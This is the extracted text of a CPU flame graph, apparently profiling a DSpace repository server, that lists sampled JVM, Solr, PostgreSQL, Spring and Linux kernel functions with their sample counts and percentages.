+ + +org/dspace/servicemanager/config/DSpaceConfigurationService:::getProperty (1 samples, 0.23%) + + + +__poll (1 samples, 0.23%) + + + +tcp_rbtree_insert (1 samples, 0.23%) + + + +java/lang/String:::hashCode (1 samples, 0.23%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +preempt_count_sub.constprop.0 (1 samples, 0.23%) + + + +org/apache/commons/dbcp/PoolingDataSource:::getConnection (2 samples, 0.45%) + + + +org/dspace/content/Bundle:::<init> (2 samples, 0.45%) + + + +java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.45%) + + + +org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.91%) + + + +org/apache/commons/logging/LogFactory:::getFactory (6 samples, 1.36%) + + + +org/dspace/core/Context:::cache (1 samples, 0.23%) + + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (3 samples, 0.68%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +update_process_times (1 samples, 0.23%) + + + +org/dspace/browse/SolrBrowseCreateDAO:::<init> (6 samples, 1.36%) + + + +nft_do_chain (4 samples, 0.91%) + + + +org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (4 samples, 0.91%) + + + +java/util/regex/Pattern$Curly:::match0 (2 samples, 0.45%) + + + +org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.23%) + + + +schedule (4 samples, 0.91%) + + + +[libjvm.so] (3 samples, 0.68%) + + + +futex_wait_queue_me (4 samples, 0.91%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +Interpreter (1 samples, 0.23%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.23%) + + + +start_thread (195 samples, 44.32%) +start_thread + + +loopback_xmit (2 samples, 0.45%) + + + +[libjvm.so] (4 samples, 0.91%) + + + +org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%) + + + +futex_wait (25 samples, 5.68%) +futex_w.. + + +sun/reflect/GeneratedConstructorAccessor22:::newInstance (6 samples, 1.36%) + + + +__sys_sendto (39 samples, 8.86%) +__sys_sendto + + +enqueue_hrtimer (1 samples, 0.23%) + + + +schedule (8 samples, 1.82%) +s.. + + +dequeue_entity (1 samples, 0.23%) + + + +entry_SYSCALL_64 (46 samples, 10.45%) +entry_SYSCALL_64 + + +nft_do_chain (1 samples, 0.23%) + + + +org/apache/http/entity/InputStreamEntity:::writeTo (4 samples, 0.91%) + + + +[[vdso]] (1 samples, 0.23%) + + + +__schedule (4 samples, 0.91%) + + + +__local_bh_enable_ip (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.23%) + + + +_complete_monitor_locking_Java (1 samples, 0.23%) + + + +copyin (1 samples, 0.23%) + + + +Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.23%) + + + +java/util/regex/Pattern:::clazz (1 samples, 0.23%) + + + +org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.23%) + + + +org/apache/log4j/Category:::error (2 samples, 0.45%) + + + +wait_woken (19 samples, 4.32%) +wait_.. + + +org/apache/http/impl/client/DefaultRequestDirector:::<init> (1 samples, 0.23%) + + + +blk_mq_complete_request (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +iptable_security_hook (1 samples, 0.23%) + + + +do_syscall_64 (8 samples, 1.82%) +d.. 
+ + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.45%) + + + +java/net/SocketInputStream:::socketRead0 (2 samples, 0.45%) + + + +org/apache/http/entity/mime/content/StringBody:::<init> (3 samples, 0.68%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%) + + + +org/apache/http/entity/mime/content/StringBody:::writeTo (1 samples, 0.23%) + + + +[libjvm.so] (6 samples, 1.36%) + + + +__schedule (19 samples, 4.32%) +__sch.. + + +jbyte_disjoint_arraycopy (2 samples, 0.45%) + + + +pthread_cond_timedwait@@GLIBC_2.3.2 (1 samples, 0.23%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (2 samples, 0.45%) + + + +[libjvm.so] (189 samples, 42.95%) +[libjvm.so] + + +__schedule (48 samples, 10.91%) +__schedule + + +queue_work_on (1 samples, 0.23%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%) + + + +org/apache/solr/common/util/JavaBinCodec:::readArray (1 samples, 0.23%) + + + +start_thread (1 samples, 0.23%) + + + +[libjvm.so] (3 samples, 0.68%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%) + + + +Interpreter (1 samples, 0.23%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::instantiateBean (7 samples, 1.59%) + + + +tcp_v4_do_rcv (6 samples, 1.36%) + + + +JNU_ThrowByName (1 samples, 0.23%) + + + +[libjvm.so] (8 samples, 1.82%) +[.. + + +[libjvm.so] (17 samples, 3.86%) +[lib.. + + +java/util/Arrays:::copyOf (1 samples, 0.23%) + + + +__hrtimer_run_queues (1 samples, 0.23%) + + + +start_thread (19 samples, 4.32%) +start.. + + +task_tick_fair (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::find (2 samples, 0.45%) + + + +[libjvm.so] (3 samples, 0.68%) + + + +schedule (4 samples, 0.91%) + + + +__intel_pmu_enable_all.constprop.0 (24 samples, 5.45%) +__intel.. + + +pthread_cond_timedwait@@GLIBC_2.3.2 (18 samples, 4.09%) +pthr.. + + +call_stub (1 samples, 0.23%) + + + +finish_task_switch (17 samples, 3.86%) +fini.. + + +[libjvm.so] (2 samples, 0.45%) + + + +hrtimer_interrupt (1 samples, 0.23%) + + + +__softirqentry_text_start (18 samples, 4.09%) +__so.. + + +futex_wait_queue_me (4 samples, 0.91%) + + + +__perf_event_task_sched_in (17 samples, 3.86%) +__pe.. + + +do_mprotect_pkey (1 samples, 0.23%) + + + +[libjvm.so] (189 samples, 42.95%) +[libjvm.so] + + +[unknown] (48 samples, 10.91%) +[unknown] + + +do_IRQ (1 samples, 0.23%) + + + +tcp_sendmsg (38 samples, 8.64%) +tcp_sendmsg + + +__intel_pmu_enable_all.constprop.0 (12 samples, 2.73%) +__.. + + +java/util/Date:::normalize (1 samples, 0.23%) + + + +do_softirq_own_stack (18 samples, 4.09%) +do_s.. + + +futex_wait_queue_me (13 samples, 2.95%) +fu.. + + +[libjvm.so] (2 samples, 0.45%) + + + +ip_rcv (16 samples, 3.64%) +ip_rcv + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +jshort_disjoint_arraycopy (1 samples, 0.23%) + + + +__schedule (25 samples, 5.68%) +__sched.. 
+ + +hrtimer_interrupt (1 samples, 0.23%) + + + +__mprotect (1 samples, 0.23%) + + + +java/net/SocketInputStream:::read (1 samples, 0.23%) + + + +apic_timer_interrupt (1 samples, 0.23%) + + + +Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.45%) + + + +entry_SYSCALL_64 (4 samples, 0.91%) + + + +tcp_newly_delivered (1 samples, 0.23%) + + + +mprotect_fixup (1 samples, 0.23%) + + + +org/apache/solr/common/util/JavaBinCodec:::readSolrDocumentList (1 samples, 0.23%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +__x64_sys_connect (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (6 samples, 1.36%) + + + +jshort_disjoint_arraycopy (1 samples, 0.23%) + + + +org/apache/solr/common/util/XML:::escape (12 samples, 2.73%) +or.. + + +__intel_pmu_enable_all.constprop.0 (16 samples, 3.64%) +__in.. + + +java/lang/StringCoding:::encode (3 samples, 0.68%) + + + +[libjvm.so] (3 samples, 0.68%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (4 samples, 0.91%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.68%) + + + +org/apache/commons/dbcp/DelegatingStatement:::executeQuery (2 samples, 0.45%) + + + +org/apache/solr/client/solrj/request/QueryRequest:::process (10 samples, 2.27%) +o.. + + +java/util/regex/Pattern$Branch:::match (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +org/dspace/util/MultiFormatDateParser:::parse (2 samples, 0.45%) + + + +org/springframework/beans/TypeConverterDelegate:::convertIfNecessary (27 samples, 6.14%) +org/spri.. + + +_copy_from_iter_full (1 samples, 0.23%) + + + +org/dspace/content/Item:::getCollections (1 samples, 0.23%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (7 samples, 1.59%) + + + +__kmalloc_node_track_caller (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +enqueue_task_fair (1 samples, 0.23%) + + + +com/atmire/dspace/discovery/AtmireSolrService:::writeDocument (49 samples, 11.14%) +com/atmire/dspac.. + + +[libjvm.so] (1 samples, 0.23%) + + + +JVM_DoPrivileged (1 samples, 0.23%) + + + +java/lang/AbstractStringBuilder:::append (1 samples, 0.23%) + + + +sk_page_frag_refill (1 samples, 0.23%) + + + +schedule (16 samples, 3.64%) +sche.. + + +update_cfs_group (1 samples, 0.23%) + + + +[libjvm.so] (14 samples, 3.18%) +[li.. + + +__mprotect (1 samples, 0.23%) + + + +do_syscall_64 (1 samples, 0.23%) + + + +org/apache/http/protocol/BasicHttpContext:::setAttribute (1 samples, 0.23%) + + + +org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%) + + + +native_write_msr (16 samples, 3.64%) +nati.. + + +java/net/URI:::<init> (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.23%) + + + +schedule (19 samples, 4.32%) +sched.. + + +scheduler_tick (1 samples, 0.23%) + + + +__virt_addr_valid (1 samples, 0.23%) + + + +__pthread_mutex_unlock_usercnt (1 samples, 0.23%) + + + +org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeanNamesForType (19 samples, 4.32%) +org/s.. + + +__perf_event_task_sched_in (4 samples, 0.91%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (13 samples, 2.95%) +or.. 
+ + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (14 samples, 3.18%) +org.. + + +futex_wait_queue_me (8 samples, 1.82%) +f.. + + +entry_SYSCALL_64 (19 samples, 4.32%) +entry.. + + +__queue_work (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +java/util/regex/Pattern:::escape (1 samples, 0.23%) + + + +ip_protocol_deliver_rcu (8 samples, 1.82%) +i.. + + +[libjvm.so] (2 samples, 0.45%) + + + +__perf_event_task_sched_in (8 samples, 1.82%) +_.. + + +finish_task_switch (8 samples, 1.82%) +f.. + + +syscall_return_via_sysret (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +java/util/LinkedHashMap:::removeEldestEntry (1 samples, 0.23%) + + + +enqueue_to_backlog (1 samples, 0.23%) + + + +copy_user_enhanced_fast_string (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (1 samples, 0.23%) + + + +org/dspace/content/Community:::getAllParents (3 samples, 0.68%) + + + +Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.23%) + + + +pick_next_task_fair (1 samples, 0.23%) + + + +finish_task_switch (4 samples, 0.91%) + + + +org/apache/solr/common/SolrInputDocument:::getFieldValues (1 samples, 0.23%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (2 samples, 0.45%) + + + +_raw_spin_lock (1 samples, 0.23%) + + + +org/apache/commons/logging/impl/SLF4JLocationAwareLog:::isDebugEnabled (1 samples, 0.23%) + + + +org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (27 samples, 6.14%) +org/dspa.. + + +tlb_is_not_lazy (1 samples, 0.23%) + + + +org/springframework/core/env/MutablePropertySources:::addLast (7 samples, 1.59%) + + + +org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.23%) + + + +java/util/Formatter:::format (7 samples, 1.59%) + + + +org/dspace/content/Item:::getCollections (3 samples, 0.68%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +prepare_exit_to_usermode (4 samples, 0.91%) + + + +org/apache/commons/dbcp/PoolableConnectionFactory:::validateConnection (2 samples, 0.45%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.45%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::tryConnect (1 samples, 0.23%) + + + +pthread_cond_wait@@GLIBC_2.3.2 (8 samples, 1.82%) +p.. + + +__hrtimer_run_queues (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +Java_java_net_PlainSocketImpl_socketSetOption0 (1 samples, 0.23%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (4 samples, 0.91%) + + + +java/util/concurrent/ConcurrentHashMap:::transfer (1 samples, 0.23%) + + + +futex_wait (48 samples, 10.91%) +futex_wait + + +java/io/FileOutputStream:::write (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%) + + + +org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.68%) + + + +C2_CompilerThre (48 samples, 10.91%) +C2_CompilerThre + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (9 samples, 2.05%) +o.. 
+ + +org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +schedule (48 samples, 10.91%) +schedule + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.23%) + + + +__x64_sys_poll (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%) + + + +org/dspace/core/PluginManager:::getNamedPlugin (3 samples, 0.68%) + + + +org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (1 samples, 0.23%) + + + +__dev_queue_xmit (2 samples, 0.45%) + + + +native_write_msr (24 samples, 5.45%) +native_.. + + +skb_copy_datagram_iter (1 samples, 0.23%) + + + +java/util/HashMap:::get (1 samples, 0.23%) + + + +[unknown] (17 samples, 3.86%) +[unk.. + + +[libjvm.so] (1 samples, 0.23%) + + + +__pthread_getspecific (1 samples, 0.23%) + + + +java/lang/Throwable:::getStackTraceElement (1 samples, 0.23%) + + + +java/util/regex/Pattern$Curly:::match0 (2 samples, 0.45%) + + + +java/util/regex/Pattern$Curly:::match0 (2 samples, 0.45%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%) + + + +org/dspace/core/Context:::<init> (2 samples, 0.45%) + + + +entry_SYSCALL_64 (18 samples, 4.09%) +entr.. + + +org/springframework/core/convert/support/DefaultConversionService:::addFallbackConverters (1 samples, 0.23%) + + + +do_syscall_64 (45 samples, 10.23%) +do_syscall_64 + + +[libjvm.so] (2 samples, 0.45%) + + + +newidle_balance (1 samples, 0.23%) + + + +java/lang/String:::split (1 samples, 0.23%) + + + +org/dspace/discovery/SearchUtils:::getAllDiscoveryConfigurations (3 samples, 0.68%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.23%) + + + +[libjvm.so] (6 samples, 1.36%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +process_backlog (16 samples, 3.64%) +proc.. + + +java/util/regex/Pattern$Curly:::match (2 samples, 0.45%) + + + +org/dspace/storage/rdbms/DatabaseManager:::findByUnique (2 samples, 0.45%) + + + +timerqueue_add (1 samples, 0.23%) + + + +sun/reflect/Reflection:::getCallerClass (1 samples, 0.23%) + + + +blk_update_request (1 samples, 0.23%) + + + +futex_wait (8 samples, 1.82%) +f.. + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (15 samples, 3.41%) +org.. 
+ + +java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.23%) + + + +org/apache/http/impl/io/AbstractSessionOutputBuffer:::flushBuffer (1 samples, 0.23%) + + + +update_load_avg.constprop.0 (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%) + + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (4 samples, 0.91%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +java/net/SocketInputStream:::socketRead0 (2 samples, 0.45%) + + + +_raw_spin_unlock (1 samples, 0.23%) + + + +nf_hook_slow (5 samples, 1.14%) + + + +update_cfs_group (1 samples, 0.23%) + + + +org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +java/net/SocketInputStream:::socketRead0 (3 samples, 0.68%) + + + +org/dspace/storage/rdbms/DatabaseManager:::process (6 samples, 1.36%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.23%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::receiveFields (1 samples, 0.23%) + + + +dequeue_entity (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.45%) + + + +org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (1 samples, 0.23%) + + + +tcp_push (1 samples, 0.23%) + + + +__update_load_avg_se (1 samples, 0.23%) + + + +__tcp_transmit_skb (28 samples, 6.36%) +__tcp_tr.. + + +netif_rx (1 samples, 0.23%) + + + +[libjvm.so] (19 samples, 4.32%) +[libj.. + + +org/apache/solr/common/util/XML:::escape (1 samples, 0.23%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.23%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%) + + + +java/net/AbstractPlainSocketImpl:::setOption (1 samples, 0.23%) + + + +org/dspace/content/DSpaceObject$MetadataCache:::get (6 samples, 1.36%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.23%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (2 samples, 0.45%) + + + +org/dspace/eperson/Group:::find (1 samples, 0.23%) + + + +__lll_lock_wait (4 samples, 0.91%) + + + +org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.23%) + + + +Interpreter (189 samples, 42.95%) +Interpreter + + +__perf_event_task_sched_in (24 samples, 5.45%) +__perf_.. + + +call_stub (189 samples, 42.95%) +call_stub + + +Interpreter (1 samples, 0.23%) + + + +tcp_sendmsg_locked (37 samples, 8.41%) +tcp_sendmsg_.. + + +[libjvm.so] (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.45%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (3 samples, 0.68%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (3 samples, 0.68%) + + + +org/dspace/discovery/SolrServiceImpl:::requiresIndexing (10 samples, 2.27%) +o.. + + +sun/nio/cs/UTF_8$Encoder:::encode (3 samples, 0.68%) + + + +org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (37 samples, 8.41%) +org/apache/s.. + + +__perf_event_task_sched_out (1 samples, 0.23%) + + + +[unknown] (19 samples, 4.32%) +[unkn.. + + +__perf_event_task_sched_in (12 samples, 2.73%) +__.. 
+ + +__futex_wait_setup (1 samples, 0.23%) + + + +__x64_sys_futex (13 samples, 2.95%) +__.. + + +mprotect_fixup (1 samples, 0.23%) + + + +JVM_DoPrivileged (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.45%) + + + +java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.23%) + + + +__intel_pmu_enable_all.constprop.0 (16 samples, 3.64%) +__in.. + + +org/apache/log4j/WriterAppender:::subAppend (2 samples, 0.45%) + + + +call_stub (1 samples, 0.23%) + + + +start_thread (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.23%) + + + +__ip_queue_xmit (27 samples, 6.14%) +__ip_que.. + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.68%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.23%) + + + +try_to_wake_up (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%) + + + +C1_CompilerThre (20 samples, 4.55%) +C1_Co.. + + +jlong_disjoint_arraycopy (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/apache/solr/common/util/JavaBinCodec:::readSolrDocument (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +native_write_msr (16 samples, 3.64%) +nati.. + + +[libjvm.so] (1 samples, 0.23%) + + + +tcp_write_xmit (33 samples, 7.50%) +tcp_write_.. + + +__wake_up_common (2 samples, 0.45%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.45%) + + + +tcp_rcv_state_process (1 samples, 0.23%) + + + +jbyte_arraycopy (1 samples, 0.23%) + + + +__x64_sys_mprotect (1 samples, 0.23%) + + + +pthread_cond_timedwait@@GLIBC_2.3.2 (25 samples, 5.68%) +pthread.. + + +[libjvm.so] (1 samples, 0.23%) + + + +__x64_sys_futex (8 samples, 1.82%) +_.. + + +[libjvm.so] (1 samples, 0.23%) + + + +[libjvm.so] (189 samples, 42.95%) +[libjvm.so] + + +org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType (28 samples, 6.36%) +org/dspa.. + + +org/apache/commons/logging/LogFactory$1:::run (2 samples, 0.45%) + + + +org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%) + + + +start_thread (3 samples, 0.68%) + + + +__perf_event_task_sched_in (4 samples, 0.91%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%) + + + +[libjvm.so] (19 samples, 4.32%) +[libj.. + + +org/springframework/core/convert/support/GenericConversionService:::getSourceConverterMap (1 samples, 0.23%) + + + +__intel_pmu_enable_all.constprop.0 (4 samples, 0.91%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +native_write_msr (16 samples, 3.64%) +nati.. + + +org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.68%) + + + +call_stub (1 samples, 0.23%) + + + +native_write_msr (4 samples, 0.91%) + + + +Ljava/lang/ref/Finalizer$FinalizerThread:::run (1 samples, 0.23%) + + + +__x64_sys_sendto (40 samples, 9.09%) +__x64_sys_sen.. + + +org/springframework/beans/PropertyEditorRegistrySupport:::createDefaultEditors (26 samples, 5.91%) +org/spr.. + + +finish_task_switch (12 samples, 2.73%) +fi.. + + +org/dspace/content/Collection:::groupFromColumn (1 samples, 0.23%) + + + +net_rx_action (16 samples, 3.64%) +net_.. + + +[libjvm.so] (1 samples, 0.23%) + + + +entry_SYSCALL_64 (8 samples, 1.82%) +e.. 
+ + +org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (1 samples, 0.23%) + + + +org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingleton (2 samples, 0.45%) + + + +entry_SYSCALL_64 (1 samples, 0.23%) + + + +inet_stream_connect (1 samples, 0.23%) + + + +__perf_event_task_sched_in (4 samples, 0.91%) + + + +entry_SYSCALL_64 (8 samples, 1.82%) +e.. + + +org/dspace/discovery/BitstreamContentStream:::getStream (2 samples, 0.45%) + + + +org/apache/http/entity/mime/FormBodyPart:::<init> (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.45%) + + + +java/util/regex/Pattern$GroupHead:::match (2 samples, 0.45%) + + + +__perf_event_task_sched_in (8 samples, 1.82%) +_.. + + +org/dspace/discovery/SolrServiceImpl:::unIndexContent (15 samples, 3.41%) +org.. + + +org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (2 samples, 0.45%) + + + +[libjvm.so] (3 samples, 0.68%) + + + +hrtimer_start_range_ns (1 samples, 0.23%) + + + +rb_insert_color (1 samples, 0.23%) + + + +do_softirq.part.0 (19 samples, 4.32%) +do_so.. + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (15 samples, 3.41%) +org.. + + +[libjvm.so] (6 samples, 1.36%) + + + +java/util/regex/Pattern:::sequence (3 samples, 0.68%) + + + +[libjava.so] (1 samples, 0.23%) + + + +do_syscall_64 (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%) + + + +org/springframework/core/env/AbstractEnvironment:::<init> (25 samples, 5.68%) +org/spr.. + + +do_syscall_64 (13 samples, 2.95%) +do.. + + +java/util/Collections$SynchronizedCollection:::add (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%) + + + +nf_nat_ipv4_out (1 samples, 0.23%) + + + +java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.23%) + + + +Interpreter (1 samples, 0.23%) + + + +org/dspace/browse/BrowseIndex:::getTableName (1 samples, 0.23%) + + + +java/security/AccessController:::doPrivileged (1 samples, 0.23%) + + + +org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (2 samples, 0.45%) + + + +org/apache/solr/client/solrj/util/ClientUtils:::writeVal (14 samples, 3.18%) +org.. + + +JVM_FillInStackTrace (1 samples, 0.23%) + + + +jshort_disjoint_arraycopy (1 samples, 0.23%) + + + +native_write_msr (8 samples, 1.82%) +n.. + + +org/dspace/content/DSpaceObject$MetadataCache:::get (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +nft_immediate_eval (1 samples, 0.23%) + + + +entry_SYSCALL_64 (1 samples, 0.23%) + + + +java/util/regex/Pattern$GroupHead:::match (2 samples, 0.45%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/springframework/core/env/StandardEnvironment:::customizePropertySources (13 samples, 2.95%) +or.. + + +do_syscall_64 (1 samples, 0.23%) + + + +futex_wait (13 samples, 2.95%) +fu.. + + +__poll (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.45%) + + + +pthread_cond_timedwait@@GLIBC_2.3.2 (13 samples, 2.95%) +pt.. + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseEntity (1 samples, 0.23%) + + + +org/dspace/content/DSpaceObject:::getMetadata (1 samples, 0.23%) + + + +__x64_sys_mprotect (1 samples, 0.23%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +[libjvm.so] (19 samples, 4.32%) +[libj.. 
+ + +org/dspace/content/Item:::find (2 samples, 0.45%) + + + +__libc_connect (1 samples, 0.23%) + + + +__vsnprintf_internal (1 samples, 0.23%) + + + +__tcp_push_pending_frames (33 samples, 7.50%) +__tcp_push.. + + +[libjvm.so] (1 samples, 0.23%) + + + +finish_task_switch (16 samples, 3.64%) +fini.. + + +[libjvm.so] (189 samples, 42.95%) +[libjvm.so] + + +java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.23%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.23%) + + + +_raw_spin_unlock (1 samples, 0.23%) + + + +java/lang/String:::equals (2 samples, 0.45%) + + + +org/dspace/discovery/configuration/DiscoverySearchFilter:::getIndexFieldName (1 samples, 0.23%) + + + +org/dspace/app/util/DailyFileAppender:::subAppend (2 samples, 0.45%) + + + +__sys_recvfrom (21 samples, 4.77%) +__sys.. + + +[libjvm.so] (2 samples, 0.45%) + + + +__this_cpu_preempt_check (1 samples, 0.23%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%) + + + +finish_task_switch (16 samples, 3.64%) +fini.. + + +[libjvm.so] (1 samples, 0.23%) + + + +Java_java_net_PlainSocketImpl_socketConnect (1 samples, 0.23%) + + + +smp_apic_timer_interrupt (1 samples, 0.23%) + + + +org/apache/log4j/helpers/PatternParser$NamedPatternConverter:::convert (1 samples, 0.23%) + + + +preempt_count_sub (1 